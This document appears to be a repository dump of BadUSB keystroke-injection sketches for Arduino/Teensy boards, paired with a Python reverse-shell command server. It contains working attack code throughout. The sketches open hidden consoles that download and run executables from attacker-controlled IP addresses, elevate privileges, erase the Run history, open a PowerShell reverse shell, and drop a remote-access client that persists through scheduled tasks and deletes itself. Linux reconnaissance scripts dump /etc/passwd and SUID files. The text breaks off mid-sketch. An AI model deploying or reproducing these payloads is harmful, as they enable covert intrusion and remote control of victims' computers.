 void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
  delay(500); 
  Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);"); 
  delay(3000);
  Keyboard.println("c:\\x.exe&exit");
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader3.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(20000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH POWERSHELL.EXE \'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://127.0.0.1/1.JPG -oUTfILE C:\\1.JPG;C:\\1.JPG\' -vERB RUNAS\"");
  Keyboard.println();
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader4.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD.EXE /t:01 /k MODE con:cols=16 lines=5");
  delay(2000); 
  Keyboard.println("ECHO sET XpOST = cREATEoBJECT(\"mICROSOFT.xmlhttp\") >WEBDOWN.VBS&ECHO XpOST.oPEN \"get\",\"HTTP://WWW.BAIDU.COM/MD5.EXE\",0 >>WEBDOWN.VBS&ECHO XpOST.sEND() >>WEBDOWN.VBS&ECHO sET SgET = cREATEoBJECT(\"adodb.sTREAM\") >>WEBDOWN.VBS&ECHO SgET.mODE = 3 >>WEBDOWN.VBS&ECHO SgET.tYPE = 1 >>WEBDOWN.VBS&ECHO SgET.oPEN() >>WEBDOWN.VBS&ECHO SgET.wRITE(XpOST.RESPONSEbODY) >>WEBDOWN.VBS&ECHO SgET.sAVEtOfILE \"x.EXE\",2 >>WEBDOWN.VBS&ECHO WSCRIPT.CREATEOBJECT(\"WSCRIPT.SHELL\").RUN \"X.EXE\" >>WEBDOWN.VBS&&WEBDOWN.VBS&&EXIT"); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_Downloader_Win&Linux_General.ino
================================================
void setup() {
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('t');
  Keyboard.release(KEY_LEFT_CTRL);
  Keyboard.release(KEY_LEFT_ALT);
  delay(1000);
  Keyboard.println("rm x.out");
  delay(1000);
  Keyboard.println("wget http://127.0.0.1/x.out -O x.out");
  delay(1000);
  Keyboard.println("chmod +x x.out");
  Keyboard.println("./x.out &");
  delay(1000);
  Keyboard.println("exit");
  
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
  delay(500); 
  Keyboard.println("echo Set xPost = CreateObject(\"Microsoft.XMLHTTP\") >webdown.vbs&echo xPost.Open \"GET\",\"http://192.168.1.102/x.exe\",0 >>webdown.vbs&echo xPost.Send() >>webdown.vbs&echo Set sGet = CreateObject(\"ADODB.Stream\") >>webdown.vbs&echo sGet.Mode = 3 >>webdown.vbs&echo sGet.Type = 1 >>webdown.vbs&echo sGet.Open() >>webdown.vbs&echo sGet.Write(xPost.responseBody) >>webdown.vbs&echo sGet.SaveToFile \"x.exe\",2 >>webdown.vbs&cscript webdown.vbs&del webdown.vbs /Q /F&x.exe&exit"); 
  Keyboard.end();
}
void loop() {
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_Writes_Bounces.ino
================================================
void setup() {
  // put your setup code here, to run once:
  //reverse_shell via cmd(local)
  delay(5000);
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_ESC);
  Keyboard.releaseAll();
  delay(500);

  Keyboard.print("cmd.exe");
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(2500);
  Keyboard.println("powershell");
  delay(200);
  Keyboard.println("function cleanup {");
  Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}");
  Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}");
  Keyboard.println("exit}");
  // Setup 192.168.202.130 HERE
  Keyboard.println("$address = '192.168.1.103'");
  // Setup PORT HERE
  Keyboard.println("$port = '8000'");
  Keyboard.println("$client = New-Object system.net.sockets.tcpclient");
  Keyboard.println("$client.connect($address,$port)");
  Keyboard.println("$stream = $client.GetStream()");
  Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
  Keyboard.println("$process = New-Object System.Diagnostics.Process");
  Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
  Keyboard.println("$process.StartInfo.RedirectStandardInput = 1");
  Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1");
  Keyboard.println("$process.StartInfo.UseShellExecute = 0");
  Keyboard.println("$process.Start()");
  Keyboard.println("$inputstream = $process.StandardInput");
  Keyboard.println("$outputstream = $process.StandardOutput");
  Keyboard.println("Start-Sleep 1");
  Keyboard.println("$encoding = new-object System.Text.AsciiEncoding");
  Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
  Keyboard.println("$out = $null; $done = $false; $testing = 0;");
  Keyboard.println("while (-not $done) {");
  Keyboard.println("if ($client.Connected -ne $true) {cleanup}");
  Keyboard.println("$pos = 0; $i = 1");
  Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
  Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
  Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
  Keyboard.println("if ($pos -gt 0) {");
  Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)");
  Keyboard.println("$inputstream.write($string)");
  Keyboard.println("start-sleep 1");
  Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}");
  Keyboard.println("else {");
  Keyboard.println("$out = $encoding.GetString($outputstream.Read())");
  Keyboard.println("while($outputstream.Peek() -ne -1){");
  Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
  Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
  Keyboard.println("$out = $null");
  Keyboard.println("$string = $null}} else {cleanup}}");
  Keyboard.println(""); //Enter to start execution

}

void loop() {
  // put your main code here, to run repeatedly:

}


================================================
FILE: TrojanDownloader/PY_DownLoader/PyShellServer.py
================================================
#!/usr/bin/env python
# -*- coding:utf-8 -*-

'''
PyShell
PyShell主要用于建立TCP连接，反弹Shell，远程执行命令
其中Server端为攻击机（远程发送命令），Client端为被控端（接收命令并执行）

'''

import socket
import base64
import sys
import binascii
import os
import re
import threading
import time
from StringIO import StringIO

class servers:

	""" Server of PyShell

		PyShell服务端代码类

	"""
	def __init__(self,server_address):
		self.server_address=server_address
		self.main()

	def connec(self):
		"""
		配置监听参数，包括ip地址，port号，最大链接数量等。
		"""
		try:
			self.server=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #TCP套接字
			self.server.bind(self.server_address) #ip:port
			self.server.listen(10)	#设置最大连接数
			print "[*]Listening on %s:%d" % (self.server_address[0],self.server_address[1])
		except:
			print u'参数填写有误,或者该端口已被占用！'

	def handle_client(self):
			'''
			从客户端接收数据，并处理。
			'''
			request=self.client.recv(409600)  #服务器端每次接收的最大数据

			request=base64.b64decode(binascii.a2b_hex(request.strip())).split('*') #将接收到的数据进行解码
			print request[0]   #输出接收到的数据
			
			path=request[1]
			contents=raw_input(path+'>')  #返回当前路径

			i='-p'
			if i in contents:
				lists=contents.split(' ')
				filename=lists[2]
				f=open(filename).read()
				contents='-p'+f

			contents_j=binascii.b2a_hex(base64.b64encode(contents)) #将要发送的数据加码
			self.client.send(contents_j+' ') #发送数据
			self.client.close()

			if contents=='kill' or contents=='exit':
				time.sleep(5)
				sys.exit()
	
	def main(self):
		self.connec() #执行连接函数
		while True:
			'''
			循环接收客户端信息
			'''
			try:
				self.client,self.addr=self.server.accept()  #接收到客户端数据对象，保存到client中，addr中的为客户端ip与端口号
				self.handle_client()   #执行接收发送数据函数
			except:
				sys.exit()

def mains():
	'''
	从控制台接收参数，执行相应的代码（Server）
	'''
	if len(sys.argv)>2:
		ip=str(sys.argv[1])
		port=int(sys.argv[2])

		address_all=(ip,port)
		servers(address_all)
		print '[HELP]  PyShell.exe [ip] [port]'
		print '[HELP]  python PyShellServer.py [ip] [port]'
		print u'connection：'
		print u'[HELP]  exit    ----退出连接'
		print u'[HELP]  kill    ----退出连接并自毁程序'
		print u'[HELP]  playtask    ----创建计划任务'
		print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'
	else:
		print '[HELP]  PyShell.exe [ip] [port]'
		print '[HELP]  python PyShellServer.py [ip] [port]'
		print u'connection：'
		print u'[HELP]  exit    ----退出连接'
		print u'[HELP]  kill    ----退出连接并自毁程序'
		print u'[HELP]  playtask    ----创建计划任务'
		print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'

if __name__=='__main__':
	mains()


================================================
FILE: TrojanDownloader/PY_DownLoader/Py_TrojanWrite(TargetEnvironmentRunPython).ino
================================================
void setup() {
  Keyboard.begin();
  delay(10000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("CMD");
  delay(1000);
 
  Keyboard.println("ECHO import socket >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import base64 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import sys >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import binascii >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import os >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import re >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import threading >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import time >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO from StringIO import StringIO >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO import requests >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO class clients: >> PyShell.py");
  delay(100); 
  Keyboard.println("ECHO 	"""Client of PythonShell >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	""" >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def __init__(self,client_address): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		self.client_address=client_address >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		self.main() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def request_client(self): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		连接服务端 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		try: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			path=os.getcwd() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)   #创建一个socket对象 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.client.connect(self.client_address)                   #连接服务端 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.contents=binascii.b2a_hex(base64.b64encode(self.contents+'*'+path)) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.client.send(self.contents) #发送数据 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		except: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			sys.exit() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def kill(self): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		kill project >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		os.popen('kill.bat').read() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def exits(self): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		exit project >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		os._exit(0) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def response_client(self): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		客户端处理服务端命令函数 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		try: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			response=self.client.recv(409600) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		except: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			sys.exit() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			response=base64.b64decode(binascii.a2b_hex(response.strip())) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			try: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				if response=='exit':  #退出当前连接！！ >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					sys.exit() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				if response=='kill':  #退出当前连接并自毁程序！！ >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					try: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						f=open('kill.bat','w') >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						f.write('ping -n 2 127.0.0.1 >nul\ndel /F PyShell.exe\ndel /F kill.bat') >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						f.close() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						threading.Thread(target=self.kill).start() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						time.sleep(0.5) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						threading.Thread(target=self.exits).start() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					except: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						pass >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				if response=='playtask':        #给自己创建计划任务！ >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					try: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						path=os.getcwd() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						name=os.popen('whoami').read().split('\\')[1].replace('\n','')  #获取当前用户名称 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						command='schtasks.exe  /Create /RU '+'"'+name+'"'+' /SC MINUTE /MO 30 /TN FIREWALL /TR '+'"'+path+\'\\PyShell.exe\'+'"'+' /ED 2016/12/12'#可执行文件一定要写绝对路径  >> PyShell.py");
  delay(100); 
  Keyboard.println("ECHO 						#以上这条为添加一条计划任务的命令！！！ >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						self.contents=os.popen(command).read() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					except: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						pass >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					i='-p' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					if i in response: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						lists=response.split('-p') >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						response=lists[1] >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						sys.stdout=result=StringIO() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						exec(response)                      #执行python脚本文件 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						self.contents=result.getvalue() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 					else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						self.contents=response.split('cd ') >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						m=re.search(self.res,response) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						if m: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							m=m.group() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							m='.' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						if len(self.contents)>1: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							os.chdir(self.contents[1].strip())          #切换目录，popen('cd ../')只能切换子目录，父目录改不了 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							self.contents=' ' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 						else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							self.contents=os.popen(self.contents[0]).read()   #执行普通的cmd命令 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 							os.chdir(m) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			except: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				self.contents=' ' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 				pass >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.client.close() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	def main(self): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		self.contents=' ' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		self.res=r'[A-Za-z]:' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		while True: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.request_client() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 			self.response_client() >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO def mains(): >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	从控制台接收参数，执行相应的代码（Client or Server） >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	''' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	url = 'https://www.youtube.com/watch?v=aDwCCUfNFug'    //自定义下载木马网址 >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO     r = requests.get(url) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO     with open('PyShell.exe', 'wb') as f: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         f.write(r.content) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	if len(sys.argv)>2: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		ip=str(sys.argv[1]) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		port=int(sys.argv[2]) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		address_all=(ip,port) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		clients(address_all) >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print u'connection：' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print u'[HELP]  exit    ----退出连接' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print u'[HELP]  playtask    ----创建计划任务' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO         print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 	else: >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print u'connection：' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print u'[HELP]  exit    ----退出连接' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print u'[HELP]  playtask    ----创建计划任务' >> PyShell.py");
  delay(100);
  Keyboard.println("ECHO 		print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py");
  delay(100);

  Keyboard.println("python PyShell.py [ip] [port]");  //输入自己的IP及端口，在攻击者电脑上执行服务器脚本，等待目标连接
  delay(2000);
    Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  delay(200);
  Keyboard.println('CMD');
  delay(600);
  Keyboard.println('EXIT');
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}


================================================
FILE: Ubuntu_InformationGathering/BasicTerminalCommandsForUbuntu(Display).ino
================================================
//Ubuntu的基本终端命令
void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.press(KEY_F2);
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_F2);
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("XTERM");
  delay(500);
  Keyboard.println();
  delay(750);
  Keyboard.print("PWD");
  delay(500);
  Keyboard.println();
  delay(300);
  Keyboard.print("ID");
  delay(300);
  Keyboard.println();
  delay(500);
  Keyboard.print("CAT /ETC/PASSWD")
  delay(500);
  Keyboard.println();
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}


================================================
FILE: Ubuntu_InformationGathering/UbuntuInformationCollectionTXT_File(Information).ino
================================================
//信息收集
//启用Ubuntu终端搜集操作系统信息
void setup() {
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.press(KEY_F2);
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_F2);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.print("GNOME-TERMINAL");
  delay(100);
  Keyboard.println();
  delay(200);
  Keyboard.print("CLEAR");
  delay(10);
  Keyboard.println();
  delay(50);
  Keyboard.print("ECHO \"lOGGED IN USER:\" $user > INFO_GATHERING.TXT");
  Keyboard.println();
  delay(50);
  Keyboard.print("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.print("ECHO 0N \"dISTRIBUTION kERNEL vERSION:\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.print("CAT /ETC/ISSUE | CUT -C1-13 >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.print("ECHO -N \"UNAME RESULTS: \" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.print("UNAME -A >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(100);
  Keyboard.print("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.print("ECHO \"sHELLSOCK bUG vULNERABILITY\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  Keyboard.print("ECHO >> INFO_GATHERING.TXT");
  Keyboard.println();
  delay(50);
  Keyboard.print("ENV X='() { :;};ECHO VULNERABLE' BASH -C `ECHO HELLO` >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(100);
  Keyboard.println();
  delay(100);
  Keyboard.print("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.println("ECHO \"mOUNTED FILESYSTEMS\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("MOUNT -L >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(100);
  Keyboard.println("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.print("ECHO \"nETWORK cONFIGURATION\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(50);
  Keyboard.println("IFCONFIG -A | GREP 'lINK\\|INET' >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO \"pRINT hOSTS\" >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("CAT /ETC/HOSTS >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO ECHO \"pRINT arp\" >>  INFO_GATHERING.TXT");
  delay(50); 
  Keyboard.println("ARP >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO \"dEVELOPMENT TOOLS AVAILABILITY\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("WHICH GCC >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("WHICH G++ >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("WHICH PYTHON >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO \"pRINT tcp/UDP lISTENING sERVICES\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("NETSTAT -TUNLPE >> INFO_GATHERING.TXT");
  delay(300);
  Keyboard.println("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.print("ECHO \"iNSTALLED pACKAGES\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  delay(200);
  Keyboard.println("DPKG -L >> INFO_GATHERING.TXT");
  delay(300);
  Keyboard.println("ECHO >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("ECHO \"fIND rEADABLE fOLDERS IN /ETC\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("FIND /ETC -USER `ID -U` -PERM -U=R -O -GROUP `ID -G` -PERM -G=R -O -PERM -O=R -LS 2> /DEV/NULL >>  INFO_GATHERING.TXT");
  delay(500);
  Keyboard.println("ECHO >>  INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println("\"fIND suid AND guid FILES\" >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.print("FIND / -TYPE F -PERM -U=S -O -TYPE F -PERM -G=S -LS 2>/DEV/NULL >> INFO_GATHERING.TXT");
  delay(50);
  Keyboard.println();
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop() {
}


================================================
FILE: WiFi_ConnectionTrojan/ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
================================================
#define BOARDTYPE
#ifdef TEENSY2
    #include<usb_private.h>
#endif



void setup(){
  
  delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd(3,500,"cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\""))
  {
  reset_windows_desktop(2000);
  }

  Keyboard.println("echo ^<?xml version=\"1.0\"?^> > %TEMP%\\pl.xml ");
